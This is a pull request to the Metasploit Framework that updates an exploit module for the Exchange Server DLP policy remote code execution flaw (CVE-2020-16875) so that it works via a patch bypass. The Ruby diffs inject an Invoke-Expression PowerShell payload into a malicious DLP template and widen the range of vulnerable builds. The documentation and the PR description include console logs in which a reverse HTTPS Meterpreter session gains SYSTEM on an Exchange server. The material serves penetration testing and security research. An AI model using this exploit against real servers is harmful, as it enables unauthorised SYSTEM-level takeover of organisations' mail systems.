### PR TITLE
Updates for Exchange ECP DLP Policy Exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/exchange_ecp_dlp_policy.md
+++ b/documentation/modules/exploit/windows/http/exchange_ecp_dlp_policy.md
@@ -2,25 +2,27 @@
 
 ### Description
 
-This vulnerability allows remote attackers to execute arbitrary code
-on affected installations of Exchange Server. Authentication is
-required to exploit this vulnerability. Additionally, the target user
-must have the `Data Loss Prevention` role assigned and an active
-mailbox.
+This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exchange Server.
+Authentication is required to exploit this vulnerability. Additionally, the target user must have the `Data Loss
+Prevention` role assigned and an active mailbox.
 
-If the user is in the `Compliance Management` or greater `Organization
-Management` role groups, then they have the `Data Loss Prevention`
-role. Since the user who installed Exchange is in the `Organization
-Management` role group, they transitively have the `Data Loss
-Prevention` role.
+If the user is in the `Compliance Management` or greater `Organization Management` role groups, then they have the `Data
+Loss Prevention` role. Since the user who installed Exchange is in the `Organization Management` role group, they
+transitively have the `Data Loss Prevention` role.
 
-The specific flaw exists within the processing of the `New-DlpPolicy`
-cmdlet. The issue results from the lack of proper validation of
-user-supplied template data when creating a DLP policy. An attacker
-can leverage this vulnerability to execute code in the context of
-`SYSTEM`.
+The specific flaw exists within the processing of the `New-DlpPolicy` cmdlet. The issue results from the lack of proper
+validation of user-supplied template data when creating a DLP policy. An attacker can leverage this vulnerability to
+execute code in the context of `SYSTEM`.
 
-Tested against Exchange Server 2016 CU17 on Windows Server 2016.
+Tested against Exchange Server 2016 CU19 on Windows Server 2016.
+
+#### A Note On Patches And Bypasses
+
+The root cause of this vulnerability was first identified and reported to Microsoft who assigned it CVE-2020-16875 and
+attempted to fix it in Exchange Server 2016 Cumulative Update (CU) 18 and Exchange Server 2019 CU7 which were released
+on September 15th, 2020. The patch was later able to be [bypassed][1], allowing newer versions upto and including 
+Exchange Server 2016 CU19 and Exchange Server 2019 CU8 which were released on December 15th 2020. One of the first patch
+bypasses was assigned CVE-2020-17132 and was addressed by Microsoft, however that patch too was able to be bypassed.
 
 ### Setup
 
@@ -34,7 +36,7 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ### 0
 
-`Exchange Server <= 2016 CU17 and 2019 CU6`
+`Exchange Server <= 2016 CU19 and 2019 CU6`
 
 ## Options
 
@@ -51,22 +53,28 @@ Set this to the OWA password.
 ### Exchange Server 2016 CU17 on Windows Server 2016
 
 ```
-msf6 > use exploit/windows/http/exchange_ecp_dlp_policy
+msf6 > use exploit/windows/http/exchange_ecp_dlp_policy 
 [*] Using configured payload windows/x64/meterpreter/reverse_https
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > options
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set USERNAME smcintyre
+USERNAME => smcintyre
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set PASSWORD Password1
+PASSWORD => Password1
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set VHOST WIN-BPID95ACQ7E
+VHOST => WIN-BPID95ACQ7E
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > show options 
 
 Module options (exploit/windows/http/exchange_ecp_dlp_policy):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
-   PASSWORD                    no        OWA password
+   PASSWORD   Password1        no        OWA password
    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS     192.168.159.42   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT      443              yes       The target port (TCP)
    SSL        true             no        Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       Base path
-   USERNAME                    no        OWA username
-   VHOST                       no        HTTP server virtual host
+   USERNAME   smcintyre        no        OWA username
+   VHOST      WIN-BPID95ACQ7E  no        HTTP server virtual host
 
 
 Payload options (windows/x64/meterpreter/reverse_https):
@@ -74,7 +82,7 @@ Payload options (windows/x64/meterpreter/reverse_https):
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
-   LHOST                      yes       The local listener hostname
+   LHOST     192.168.159.128  yes       The local listener hostname
    LPORT     8443             yes       The local listener port
    LURI                       no        The HTTP Path
 
@@ -83,41 +91,35 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Exchange Server <= 2016 CU17 and 2019 CU6
+   0   Exchange Server <= 2016 CU19 and 2019 CU8
 
 
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set rhosts 192.168.123.178
-rhosts => 192.168.123.178
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set username Administrator
-username => Administrator
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set password Passw0rd!
-password => Passw0rd!
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > set lhost 192.168.123.1
-lhost => 192.168.123.1
-msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > check
+[*] 192.168.159.42:443 - The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
+msf6 exploit(windows/http/exchange_ecp_dlp_policy) > exploit
 
-[*] Started HTTPS reverse handler on https://192.168.123.1:8443
+[*] Started HTTPS reverse handler on https://192.168.159.128:8443
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target appears to be vulnerable. Exchange Server 15.1.2044 is a vulnerable build.
-[*] Logging in to OWA with creds Administrator:Passw0rd!
+[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
+[*] Logging in to OWA with creds smcintyre:Password1
 [+] Successfully logged in to OWA
 [*] Retrieving ViewState from DLP policy creation page
 [+] Successfully retrieved ViewState
 [*] Creating custom DLP policy from malicious template
-[*] DLP policy name: Abn Amro Corporate Finance Limited Data
-[*] Powershell command length: 2472
-[*] https://192.168.123.1:8443 handling request from 192.168.123.178; (UUID: jk8kdh8r) Staging x64 payload (201308 bytes) ...
-[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.178:28314) at 2020-10-20 14:30:05 -0500
+[*] https://192.168.159.128:8443 handling request from 192.168.159.42; (UUID: lg8kqsog) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.42:37415) at 2021-01-13 09:17:08 -0500
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
-Computer        : WIN-G2PGASM3QFA
+Computer        : WIN-BPID95ACQ7E
 OS              : Windows 2016+ (10.0 Build 14393).
 Architecture    : x64
 System Language : en_US
-Domain          : GIBSON
-Logged On Users : 8
+Domain          : EXCHG
+Logged On Users : 9
 Meterpreter     : x64/windows
-meterpreter >
+meterpreter > 
 ```
+
+[1]: https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html

--- a/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
+++ b/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'faker'
+
 class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ExcellentRanking
@@ -242,12 +244,12 @@ class MetasploitModule < Msf::Exploit::Remote
       <dlpPolicyTemplates>
         <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
           <contentVersion>4</contentVersion>
-          <publisherName>Metasploit</publisherName>
+          <publisherName>#{Faker::Company.name}</publisherName>
           <name>
             <localizedString lang="en">#{dlp_policy_name}</localizedString>
           </name>
           <description>
-            <localizedString lang="en">wvu was here</localizedString>
+            <localizedString lang="en">#{Faker::Hacker.say_something_smart}</localizedString>
           </description>
           <keywords></keywords>
           <ruleParameters></ruleParameters>
@@ -263,7 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def dlp_policy_name
-    @dlp_policy_name ||= "#{Faker::Bank.name.titleize} Data"
+    @dlp_policy_name ||= "#{Faker::Company.name} Data"
   end
 
   def dlp_policy_filename

--- a/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
+++ b/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
           can leverage this vulnerability to execute code in the context of
           SYSTEM.
 
-          Tested against Exchange Server 2016 CU17 on Windows Server 2016.
+          Tested against Exchange Server 2016 CU19 on Windows Server 2016.
         },
         'Author' => [
           'mr_me', # Discovery, exploits, and most of the words above
@@ -43,13 +43,15 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2020-16875'],
+          ['CVE', '2020-17132'],
           ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875'],
           ['URL', 'https://support.microsoft.com/en-us/help/4577352/security-update-for-exchange-server-2019-and-2016'],
           ['URL', 'https://srcincite.io/advisories/src-2020-0019/'],
           ['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'],
-          ['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt']
+          ['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt'],
+          ['URL', 'https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html'],
         ],
-        'DisclosureDate' => '2020-09-08', # Public disclosure
+        'DisclosureDate' => '2021-01-12', # Original public disclosure: 2020-09-08, latest patch bypass supported by this module: 2021-01-12
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => [ARCH_X86, ARCH_X64],
@@ -246,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
           <ruleParameters></ruleParameters>
           <policyCommands>
             <commandBlock>
-              <![CDATA[#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}]]>
+              <![CDATA[ & "Invoke-Expression" "#{cmd_psh_payload(payload.encoded, payload.arch.first, exec_in_place: true)}"; New-TransportRule -DlpPolicy ]]>
             </commandBlock>
           </policyCommands>
           <policyCommandsResources></policyCommandsResources>

--- a/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
+++ b/modules/exploits/windows/http/exchange_ecp_dlp_policy.rb
@@ -38,8 +38,12 @@ class MetasploitModule < Msf::Exploit::Remote
           Tested against Exchange Server 2016 CU19 on Windows Server 2016.
         },
         'Author' => [
-          'mr_me', # Discovery, exploits, and most of the words above
-          'wvu' # Module
+          'Leonard Rapp', # Patch Diffing and Analysis
+          'Markus Vervier', # PoC / Exploitation
+          'Steven Seeley', # (mr_me) for the original PoC and good discussions
+          'Yasar Klawohn', # PoC / Bypass
+          'wvu', # Module
+          'Spencer McIntyre' # Professional coat-tail rider
         ],
         'References' => [
           ['CVE', '2020-16875'],
@@ -50,6 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://srcincite.io/pocs/cve-2020-16875.py.txt'],
           ['URL', 'https://srcincite.io/pocs/cve-2020-16875.ps1.txt'],
           ['URL', 'https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html'],
+          ['URL', 'https://www.x41-dsec.de/security/advisory/exploit/research/2020/12/21/x41-microsoft-exchange-rce-dlp-bypass/']
         ],
         'DisclosureDate' => '2021-01-12', # Original public disclosure: 2020-09-08, latest patch bypass supported by this module: 2021-01-12
         'License' => MSF_LICENSE,
@@ -57,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
-          ['Exchange Server <= 2016 CU17 and 2019 CU6', {}]
+          ['Exchange Server <= 2016 CU19 and 2019 CU8', {}] # December 2020 updates
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
@@ -102,8 +107,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def vuln_builds
     # https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019
     [
-      [Gem::Version.new('15.1.225'), Gem::Version.new('15.1.2044')], # Exchange Server 2016
-      [Gem::Version.new('15.2.196'), Gem::Version.new('15.2.659')] # Exchange Server 2019
+      [Gem::Version.new('15.1.225'), Gem::Version.new('15.1.2176')], # Exchange Server 2016
+      [Gem::Version.new('15.2.196'), Gem::Version.new('15.2.792')] # Exchange Server 2019
     ]
   end
 


### PR DESCRIPTION
This updates the `exchange_ecp_dlp_policy` module to leverage the technique [disclosed today](https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html) which bypasses the original patch. I updated the exploit logic to use the new technique after verifying the original did not work against Exchange Server 2016 CU19. After updating the exploit, I reverted back to my older version of Exchange and validated that it still worked, which it does so we can safely use the bypass technique as a one-size-fits all. The older version I tested was Exchange Server 2016 CU12. I also added a paragraph to the docs describing the relationships between the patches, updates and CVEs.

The exploit and check method both work. The exploit does need to be authenticated and the user needs to have an admin privilege. I just used a domain admin account in my lab which was the easiest way to get the necessary privileges.

Tested on Exchange Server 2016 with CU19 released December 2020 (latest cumulative update).
```
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > show options 

Module options (exploit/windows/http/exchange_ecp_dlp_policy):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   Password1        no        OWA password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.42   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   USERNAME   alice            no        OWA username
   VHOST      WIN-BPID95ACQ7E  no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Exchange Server <= 2016 CU19 and 2019 CU8


msf6 exploit(windows/http/exchange_ecp_dlp_policy) > exploit
[*] Reloading module...

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Exchange Server 15.1.2176 is a vulnerable build.
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] https://192.168.159.128:8443 handling request from 192.168.159.42; (UUID: zeitmqvn) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.42:9211) at 2021-01-12 17:59:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BPID95ACQ7E
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : EXCHG
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.42 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/http/exchange_ecp_dlp_policy) >
```

Updates #14126.